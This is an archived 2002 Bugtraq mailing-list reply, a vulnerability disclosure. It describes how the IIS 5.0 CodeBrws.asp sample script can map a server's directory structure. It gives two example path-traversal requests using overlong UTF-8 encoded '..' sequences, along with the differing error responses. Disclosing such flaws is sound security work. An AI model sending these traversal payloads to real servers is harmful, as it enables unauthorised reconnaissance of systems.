[25115] in bugtraq
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
daemon@ATHENA.MIT.EDU (Joe Testa)
Wed Apr 17 17:59:05 2002
Message-ID: <3CBDBA0E.6030402@rapid7.com>
Date: Wed, 17 Apr 2002 14:08:14 -0400
From: Joe Testa <jtesta@rapid7.com>
MIME-Version: 1.0
To: H D Moore <sflist@digitaloffense.net>, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This vulnerability can also be used to determine the directory structure
of an
affected system.
When an attempt is made to access a non-existent ASP file outside the
'IISamples' root, CodeBrws.asp will respond differently based on whether or
not the path to the file is valid.
Below is an example:
Request:
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
Response: Microsoft VBScript runtime (0x800A004C) Path not found
Request:
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp
Response: Microsoft VBScript runtime (0x800A0035) File not found
Credits go to Tas Giakouminakis for discovering this.
- Joe Testa
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE8vbj5ZbL130sRBrQRAj1QAJ9rFZH5aJnSjZwpijO4zRhr2bnmeACgu5Tz
DE4zfFekNxFjYlg6/H5KtyA=
=8vyn
-----END PGP SIGNATURE-----
